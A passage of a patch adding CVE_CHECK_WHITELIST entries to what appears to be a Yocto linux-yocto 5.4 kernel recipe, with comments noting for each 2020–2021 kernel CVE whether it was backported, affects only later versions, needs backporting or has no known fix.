+CVE_CHECK_WHITELIST += "CVE-2020-27171"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-27194"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-2732"
+
+# cpe-stable-backport: Backported in 5.4.25
+CVE_CHECK_WHITELIST += "CVE-2020-27418"
+
+# cpe-stable-backport: Backported in 5.4.75
+CVE_CHECK_WHITELIST += "CVE-2020-27673"
+
+# cpe-stable-backport: Backported in 5.4.75
+CVE_CHECK_WHITELIST += "CVE-2020-27675"
+
+# cpe-stable-backport: Backported in 5.4.75
+CVE_CHECK_WHITELIST += "CVE-2020-27777"
+
+# cpe-stable-backport: Backported in 5.4.73
+CVE_CHECK_WHITELIST += "CVE-2020-27784"
+
+# cpe-stable-backport: Backported in 5.4.42
+CVE_CHECK_WHITELIST += "CVE-2020-27786"
+
+# cpe-stable-backport: Backported in 5.4.86
+CVE_CHECK_WHITELIST += "CVE-2020-27815"
+
+# cpe-stable-backport: Backported in 5.4.162
+CVE_CHECK_WHITELIST += "CVE-2020-27820"
+
+# cpe-stable-backport: Backported in 5.4.94
+CVE_CHECK_WHITELIST += "CVE-2020-27825"
+
+# cpe-stable-backport: Backported in 5.4.83
+CVE_CHECK_WHITELIST += "CVE-2020-27830"
+
+# CVE-2020-27835 needs backporting (fixed from 5.10rc6)
+
+# cpe-stable-backport: Backported in 5.4.66
+CVE_CHECK_WHITELIST += "CVE-2020-28097"
+
+# cpe-stable-backport: Backported in 5.4.89
+CVE_CHECK_WHITELIST += "CVE-2020-28374"
+
+# cpe-stable-backport: Backported in 5.4.83
+CVE_CHECK_WHITELIST += "CVE-2020-28588"
+
+# cpe-stable-backport: Backported in 5.4.71
+CVE_CHECK_WHITELIST += "CVE-2020-28915"
+
+# cpe-stable-backport: Backported in 5.4.80
+CVE_CHECK_WHITELIST += "CVE-2020-28941"
+
+# cpe-stable-backport: Backported in 5.4.76
+CVE_CHECK_WHITELIST += "CVE-2020-28974"
+
+# cpe-stable-backport: Backported in 5.4.48
+CVE_CHECK_WHITELIST += "CVE-2020-29368"
+
+# cpe-stable-backport: Backported in 5.4.54
+CVE_CHECK_WHITELIST += "CVE-2020-29369"
+
+# cpe-stable-backport: Backported in 5.4.27
+CVE_CHECK_WHITELIST += "CVE-2020-29370"
+
+# cpe-stable-backport: Backported in 5.4.61
+CVE_CHECK_WHITELIST += "CVE-2020-29371"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-29372"
+
+# CVE-2020-29373 needs backporting (fixed from 5.6rc2)
+
+# cpe-stable-backport: Backported in 5.4.47
+CVE_CHECK_WHITELIST += "CVE-2020-29374"
+
+# CVE-2020-29534 needs backporting (fixed from 5.10rc1)
+
+# cpe-stable-backport: Backported in 5.4.86
+CVE_CHECK_WHITELIST += "CVE-2020-29568"
+
+# cpe-stable-backport: Backported in 5.4.86
+CVE_CHECK_WHITELIST += "CVE-2020-29569"
+
+# cpe-stable-backport: Backported in 5.4.83
+CVE_CHECK_WHITELIST += "CVE-2020-29660"
+
+# cpe-stable-backport: Backported in 5.4.83
+CVE_CHECK_WHITELIST += "CVE-2020-29661"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-35499"
+
+# CVE-2020-35501 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.76
+CVE_CHECK_WHITELIST += "CVE-2020-35508"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2020-35513"
+
+# cpe-stable-backport: Backported in 5.4.82
+CVE_CHECK_WHITELIST += "CVE-2020-35519"
+
+# cpe-stable-backport: Backported in 5.4.88
+CVE_CHECK_WHITELIST += "CVE-2020-36158"
+
+# CVE-2020-36310 needs backporting (fixed from 5.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.131
+CVE_CHECK_WHITELIST += "CVE-2020-36311"
+
+# cpe-stable-backport: Backported in 5.4.66
+CVE_CHECK_WHITELIST += "CVE-2020-36312"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36313"
+
+# cpe-stable-backport: Backported in 5.4.88
+CVE_CHECK_WHITELIST += "CVE-2020-36322"
+
+# CVE-2020-36385 needs backporting (fixed from 5.10rc1)
+
+# cpe-stable-backport: Backported in 5.4.58
+CVE_CHECK_WHITELIST += "CVE-2020-36386"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36387"
+
+# cpe-stable-backport: Backported in 5.4.176
+CVE_CHECK_WHITELIST += "CVE-2020-36516"
+
+# cpe-stable-backport: Backported in 5.4.30
+CVE_CHECK_WHITELIST += "CVE-2020-36557"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-36558"
+
+# CVE-2020-36691 needs backporting (fixed from 5.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.86
+CVE_CHECK_WHITELIST += "CVE-2020-36694"
+
+# cpe-stable-backport: Backported in 5.4.62
+CVE_CHECK_WHITELIST += "CVE-2020-36766"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2020-36775"
+
+# fixed-version: only affects 5.8rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36776"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2020-36777"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36778"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36779"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2020-36780"
+
+# CVE-2020-36781 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2020-36782"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2020-36783"
+
+# CVE-2020-36784 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36785"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36786"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2020-36787"
+
+# cpe-stable-backport: Backported in 5.4.143
+CVE_CHECK_WHITELIST += "CVE-2020-3702"
+
+# cpe-stable-backport: Backported in 5.4.79
+CVE_CHECK_WHITELIST += "CVE-2020-4788"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2020-7053"
+
+# cpe-stable-backport: Backported in 5.4.16
+CVE_CHECK_WHITELIST += "CVE-2020-8428"
+
+# cpe-stable-backport: Backported in 5.4.25
+CVE_CHECK_WHITELIST += "CVE-2020-8647"
+
+# cpe-stable-backport: Backported in 5.4.25
+CVE_CHECK_WHITELIST += "CVE-2020-8648"
+
+# cpe-stable-backport: Backported in 5.4.25
+CVE_CHECK_WHITELIST += "CVE-2020-8649"
+
+# cpe-stable-backport: Backported in 5.4.77
+CVE_CHECK_WHITELIST += "CVE-2020-8694"
+
+# CVE-2020-8832 has no known resolution
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2020-8834"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-8835"
+
+# cpe-stable-backport: Backported in 5.4.21
+CVE_CHECK_WHITELIST += "CVE-2020-8992"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-9383"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-9391"
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2021-0129"
+
+# cpe-stable-backport: Backported in 5.4.47
+CVE_CHECK_WHITELIST += "CVE-2021-0342"
+
+# CVE-2021-0399 has no known resolution
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2021-0447"
+
+# cpe-stable-backport: Backported in 5.4.70
+CVE_CHECK_WHITELIST += "CVE-2021-0448"
+
+# cpe-stable-backport: Backported in 5.4.101
+CVE_CHECK_WHITELIST += "CVE-2021-0512"
+
+# cpe-stable-backport: Backported in 5.4.68
+CVE_CHECK_WHITELIST += "CVE-2021-0605"
+
+# CVE-2021-0606 has no known resolution
+
+# CVE-2021-0695 has no known resolution
+
+# fixed-version: only affects 5.8rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-0707"
+
+# cpe-stable-backport: Backported in 5.4.137
+CVE_CHECK_WHITELIST += "CVE-2021-0920"
+
+# CVE-2021-0924 has no known resolution
+
+# CVE-2021-0929 needs backporting (fixed from 5.6rc1)
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2021-0935"
+
+# CVE-2021-0936 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.113
+CVE_CHECK_WHITELIST += "CVE-2021-0937"
+
+# cpe-stable-backport: Backported in 5.4.84
+CVE_CHECK_WHITELIST += "CVE-2021-0938"
+
+# cpe-stable-backport: Backported in 5.4.110
+CVE_CHECK_WHITELIST += "CVE-2021-0941"
+
+# CVE-2021-0961 has no known resolution
+
+# fixed-version: only affects 5.9rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-1048"
+
+# CVE-2021-20177 needs backporting (fixed from 5.5rc1)
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-20194"
+
+# CVE-2021-20219 has no known resolution
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-20226"
+
+# CVE-2021-20239 needs backporting (fixed from 5.9rc1)
+
+# fixed-version: Fixed after version 4.5rc5
+CVE_CHECK_WHITELIST += "CVE-2021-20261"
+
+# fixed-version: Fixed after version 4.5rc3
+CVE_CHECK_WHITELIST += "CVE-2021-20265"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-20268"
+
+# cpe-stable-backport: Backported in 5.4.59
+CVE_CHECK_WHITELIST += "CVE-2021-20292"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2021-20317"
+
+# cpe-stable-backport: Backported in 5.4.148
+CVE_CHECK_WHITELIST += "CVE-2021-20320"
+
+# cpe-stable-backport: Backported in 5.4.153
+CVE_CHECK_WHITELIST += "CVE-2021-20321"
+
+# cpe-stable-backport: Backported in 5.4.146
+CVE_CHECK_WHITELIST += "CVE-2021-20322"
+
+# cpe-stable-backport: Backported in 5.4.99
+CVE_CHECK_WHITELIST += "CVE-2021-21781"
+
+# cpe-stable-backport: Backported in 5.4.129
+CVE_CHECK_WHITELIST += "CVE-2021-22543"
+
+# cpe-stable-backport: Backported in 5.4.113
+CVE_CHECK_WHITELIST += "CVE-2021-22555"
+
+# fixed-version: only affects 5.6 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-22600"
+
+# cpe-stable-backport: Backported in 5.4.114
+CVE_CHECK_WHITELIST += "CVE-2021-23133"
+
+# fixed-version: only affects 5.12rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-23134"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2021-26401"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-26708"
+
+# cpe-stable-backport: Backported in 5.4.100
+CVE_CHECK_WHITELIST += "CVE-2021-26930"
+
+# cpe-stable-backport: Backported in 5.4.100
+CVE_CHECK_WHITELIST += "CVE-2021-26931"
+
+# cpe-stable-backport: Backported in 5.4.100
+CVE_CHECK_WHITELIST += "CVE-2021-26932"
+
+# CVE-2021-26934 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.103
+CVE_CHECK_WHITELIST += "CVE-2021-27363"
+
+# cpe-stable-backport: Backported in 5.4.103
+CVE_CHECK_WHITELIST += "CVE-2021-27364"
+
+# cpe-stable-backport: Backported in 5.4.103
+CVE_CHECK_WHITELIST += "CVE-2021-27365"
+
+# cpe-stable-backport: Backported in 5.4.103
+CVE_CHECK_WHITELIST += "CVE-2021-28038"
+
+# fixed-version: only affects 5.9rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-28039"
+
+# cpe-stable-backport: Backported in 5.4.106
+CVE_CHECK_WHITELIST += "CVE-2021-28375"
+
+# cpe-stable-backport: Backported in 5.4.106
+CVE_CHECK_WHITELIST += "CVE-2021-28660"
+
+# cpe-stable-backport: Backported in 5.4.109
+CVE_CHECK_WHITELIST += "CVE-2021-28688"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-28691"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-28711"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-28712"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-28713"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-28714"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-28715"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-28950"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-28951"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-28952"
+
+# cpe-stable-backport: Backported in 5.4.108
+CVE_CHECK_WHITELIST += "CVE-2021-28964"
+
+# cpe-stable-backport: Backported in 5.4.108
+CVE_CHECK_WHITELIST += "CVE-2021-28971"
+
+# cpe-stable-backport: Backported in 5.4.108
+CVE_CHECK_WHITELIST += "CVE-2021-28972"
+
+# cpe-stable-backport: Backported in 5.4.111
+CVE_CHECK_WHITELIST += "CVE-2021-29154"
+
+# CVE-2021-29155 needs backporting (fixed from 5.12rc8)
+
+# cpe-stable-backport: Backported in 5.4.109
+CVE_CHECK_WHITELIST += "CVE-2021-29264"
+
+# cpe-stable-backport: Backported in 5.4.106
+CVE_CHECK_WHITELIST += "CVE-2021-29265"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-29266"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-29646"
+
+# cpe-stable-backport: Backported in 5.4.109
+CVE_CHECK_WHITELIST += "CVE-2021-29647"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-29648"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-29649"
+
+# cpe-stable-backport: Backported in 5.4.109
+CVE_CHECK_WHITELIST += "CVE-2021-29650"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-29657"
+
+# cpe-stable-backport: Backported in 5.4.103
+CVE_CHECK_WHITELIST += "CVE-2021-30002"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-30178"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-31440"
+
+# cpe-stable-backport: Backported in 5.4.92
+CVE_CHECK_WHITELIST += "CVE-2021-3178"
+
+# cpe-stable-backport: Backported in 5.4.117
+CVE_CHECK_WHITELIST += "CVE-2021-31829"
+
+# cpe-stable-backport: Backported in 5.4.109
+CVE_CHECK_WHITELIST += "CVE-2021-31916"
+
+# CVE-2021-32078 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-32399"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-32606"
+
+# cpe-stable-backport: Backported in 5.4.106
+CVE_CHECK_WHITELIST += "CVE-2021-33033"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-33034"
+
+# CVE-2021-33061 needs backporting (fixed from 5.18rc1)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-33098"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-33135"
+
+# fixed-version: only affects 5.12rc8 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-33200"
+
+# cpe-stable-backport: Backported in 5.4.94
+CVE_CHECK_WHITELIST += "CVE-2021-3347"
+
+# cpe-stable-backport: Backported in 5.4.95
+CVE_CHECK_WHITELIST += "CVE-2021-3348"
+
+# cpe-stable-backport: Backported in 5.4.139
+CVE_CHECK_WHITELIST += "CVE-2021-33624"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2021-33630"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2021-33631"
+
+# cpe-stable-backport: Backported in 5.4.205
+CVE_CHECK_WHITELIST += "CVE-2021-33655"
+
+# cpe-stable-backport: Backported in 5.4.202
+CVE_CHECK_WHITELIST += "CVE-2021-33656"
+
+# cpe-stable-backport: Backported in 5.4.134
+CVE_CHECK_WHITELIST += "CVE-2021-33909"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3411"
+
+# cpe-stable-backport: Backported in 5.4.62
+CVE_CHECK_WHITELIST += "CVE-2021-3428"
+
+# cpe-stable-backport: Backported in 5.4.101
+CVE_CHECK_WHITELIST += "CVE-2021-3444"
+
+# cpe-stable-backport: Backported in 5.4.146
+CVE_CHECK_WHITELIST += "CVE-2021-34556"
+
+# cpe-stable-backport: Backported in 5.4.128
+CVE_CHECK_WHITELIST += "CVE-2021-34693"
+
+# cpe-stable-backport: Backported in 5.4.110
+CVE_CHECK_WHITELIST += "CVE-2021-3483"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-34866"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3489"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3490"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3491"
+
+# CVE-2021-3492 has no known resolution
+
+# CVE-2021-3493 needs backporting (fixed from 5.11rc1)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-34981"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3501"
+
+# cpe-stable-backport: Backported in 5.4.129
+CVE_CHECK_WHITELIST += "CVE-2021-35039"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-3506"
+
+# CVE-2021-3542 has no known resolution
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3543"
+
+# cpe-stable-backport: Backported in 5.4.146
+CVE_CHECK_WHITELIST += "CVE-2021-35477"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-3564"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-3573"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-3587"
+
+# cpe-stable-backport: Backported in 5.4.98
+CVE_CHECK_WHITELIST += "CVE-2021-3600"
+
+# cpe-stable-backport: Backported in 5.4.132
+CVE_CHECK_WHITELIST += "CVE-2021-3609"
+
+# cpe-stable-backport: Backported in 5.4.102
+CVE_CHECK_WHITELIST += "CVE-2021-3612"
+
+# cpe-stable-backport: Backported in 5.4.14
+CVE_CHECK_WHITELIST += "CVE-2021-3635"
+
+# cpe-stable-backport: Backported in 5.4.160
+CVE_CHECK_WHITELIST += "CVE-2021-3640"
+
+# cpe-stable-backport: Backported in 5.4.142
+CVE_CHECK_WHITELIST += "CVE-2021-3653"
+
+# cpe-stable-backport: Backported in 5.4.133
+CVE_CHECK_WHITELIST += "CVE-2021-3655"
+
+# cpe-stable-backport: Backported in 5.4.142
+CVE_CHECK_WHITELIST += "CVE-2021-3656"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2021-3659"
+
+# CVE-2021-3669 needs backporting (fixed from 5.15rc1)
+
+# cpe-stable-backport: Backported in 5.4.136
+CVE_CHECK_WHITELIST += "CVE-2021-3679"
+
+# CVE-2021-3714 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.29
+CVE_CHECK_WHITELIST += "CVE-2021-3715"
+
+# cpe-stable-backport: Backported in 5.4.151
+CVE_CHECK_WHITELIST += "CVE-2021-37159"
+
+# cpe-stable-backport: Backported in 5.4.141
+CVE_CHECK_WHITELIST += "CVE-2021-3732"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3736"
+
+# cpe-stable-backport: Backported in 5.4.144
+CVE_CHECK_WHITELIST += "CVE-2021-3739"
+
+# cpe-stable-backport: Backported in 5.4.128
+CVE_CHECK_WHITELIST += "CVE-2021-3743"
+
+# cpe-stable-backport: Backported in 5.4.151
+CVE_CHECK_WHITELIST += "CVE-2021-3744"
+
+# cpe-stable-backport: Backported in 5.4.160
+CVE_CHECK_WHITELIST += "CVE-2021-3752"
+
+# cpe-stable-backport: Backported in 5.4.144
+CVE_CHECK_WHITELIST += "CVE-2021-3753"
+
+# cpe-stable-backport: Backported in 5.4.136
+CVE_CHECK_WHITELIST += "CVE-2021-37576"
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2021-3759"
+
+# cpe-stable-backport: Backported in 5.4.156
+CVE_CHECK_WHITELIST += "CVE-2021-3760"
+
+# cpe-stable-backport: Backported in 5.4.151
+CVE_CHECK_WHITELIST += "CVE-2021-3764"
+
+# cpe-stable-backport: Backported in 5.4.157
+CVE_CHECK_WHITELIST += "CVE-2021-3772"
+
+# cpe-stable-backport: Backported in 5.4.134
+CVE_CHECK_WHITELIST += "CVE-2021-38160"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38166"
+
+# cpe-stable-backport: Backported in 5.4.141
+CVE_CHECK_WHITELIST += "CVE-2021-38198"
+
+# cpe-stable-backport: Backported in 5.4.134
+CVE_CHECK_WHITELIST += "CVE-2021-38199"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38200"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38201"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38202"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38203"
+
+# cpe-stable-backport: Backported in 5.4.136
+CVE_CHECK_WHITELIST += "CVE-2021-38204"
+
+# cpe-stable-backport: Backported in 5.4.141
+CVE_CHECK_WHITELIST += "CVE-2021-38205"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38206"
+
+# fixed-version: only affects 5.6rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38207"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-38208"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38209"
+
+# cpe-stable-backport: Backported in 5.4.153
+CVE_CHECK_WHITELIST += "CVE-2021-38300"
+
+# CVE-2021-3847 has no known resolution
+
+# CVE-2021-3864 has no known resolution
+
+# CVE-2021-3892 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.155
+CVE_CHECK_WHITELIST += "CVE-2021-3894"
+
+# cpe-stable-backport: Backported in 5.4.156
+CVE_CHECK_WHITELIST += "CVE-2021-3896"
+
+# cpe-stable-backport: Backported in 5.4.171
+CVE_CHECK_WHITELIST += "CVE-2021-3923"
+
+# cpe-stable-backport: Backported in 5.4.144
+CVE_CHECK_WHITELIST += "CVE-2021-39633"
+
+# cpe-stable-backport: Backported in 5.4.70
+CVE_CHECK_WHITELIST += "CVE-2021-39634"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2021-39636"
+
+# cpe-stable-backport: Backported in 5.4.89
+CVE_CHECK_WHITELIST += "CVE-2021-39648"
+
+# cpe-stable-backport: Backported in 5.4.106
+CVE_CHECK_WHITELIST += "CVE-2021-39656"
+
+# cpe-stable-backport: Backported in 5.4.93
+CVE_CHECK_WHITELIST += "CVE-2021-39657"
+
+# cpe-stable-backport: Backported in 5.4.165
+CVE_CHECK_WHITELIST += "CVE-2021-39685"
+
+# cpe-stable-backport: Backported in 5.4.160
+CVE_CHECK_WHITELIST += "CVE-2021-39686"
+
+# cpe-stable-backport: Backported in 5.4.165
+CVE_CHECK_WHITELIST += "CVE-2021-39698"
+
+# fixed-version: Fixed after version 4.18rc6
+CVE_CHECK_WHITELIST += "CVE-2021-39711"
+
+# fixed-version: Fixed after version 4.20rc1
+CVE_CHECK_WHITELIST += "CVE-2021-39713"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2021-39714"
+
+# CVE-2021-39800 has no known resolution
+
+# CVE-2021-39801 has no known resolution
+
+# CVE-2021-39802 has no known resolution
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4001"
+
+# cpe-stable-backport: Backported in 5.4.162
+CVE_CHECK_WHITELIST += "CVE-2021-4002"
+
+# CVE-2021-4023 needs backporting (fixed from 5.15rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4028"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4032"
+
+# cpe-stable-backport: Backported in 5.4.241
+CVE_CHECK_WHITELIST += "CVE-2021-4037"
+
+# cpe-stable-backport: Backported in 5.4.145
+CVE_CHECK_WHITELIST += "CVE-2021-40490"
+
+# cpe-stable-backport: Backported in 5.4.164
+CVE_CHECK_WHITELIST += "CVE-2021-4083"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4090"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4093"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4095"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-41073"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-4135"
+
+# CVE-2021-4148 needs backporting (fixed from 5.15)
+
+# cpe-stable-backport: Backported in 5.4.155
+CVE_CHECK_WHITELIST += "CVE-2021-4149"
+
+# CVE-2021-4150 needs backporting (fixed from 5.15rc7)
+
+# cpe-stable-backport: Backported in 5.4.134
+CVE_CHECK_WHITELIST += "CVE-2021-4154"
+
+# cpe-stable-backport: Backported in 5.4.171
+CVE_CHECK_WHITELIST += "CVE-2021-4155"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-4157"
+
+# cpe-stable-backport: Backported in 5.4.210
+CVE_CHECK_WHITELIST += "CVE-2021-4159"
+
+# cpe-stable-backport: Backported in 5.4.153
+CVE_CHECK_WHITELIST += "CVE-2021-41864"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2021-4197"
+
+# cpe-stable-backport: Backported in 5.4.143
+CVE_CHECK_WHITELIST += "CVE-2021-42008"
+
+# cpe-stable-backport: Backported in 5.4.162
+CVE_CHECK_WHITELIST += "CVE-2021-4202"
+
+# cpe-stable-backport: Backported in 5.4.151
+CVE_CHECK_WHITELIST += "CVE-2021-4203"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4204"
+
+# CVE-2021-4218 needs backporting (fixed from 5.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.148
+CVE_CHECK_WHITELIST += "CVE-2021-42252"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-42327"
+
+# cpe-stable-backport: Backported in 5.4.158
+CVE_CHECK_WHITELIST += "CVE-2021-42739"
+
+# cpe-stable-backport: Backported in 5.4.156
+CVE_CHECK_WHITELIST += "CVE-2021-43056"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-43057"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-43267"
+
+# cpe-stable-backport: Backported in 5.4.156
+CVE_CHECK_WHITELIST += "CVE-2021-43389"
+
+# cpe-stable-backport: Backported in 5.4.164
+CVE_CHECK_WHITELIST += "CVE-2021-43975"
+
+# cpe-stable-backport: Backported in 5.4.174
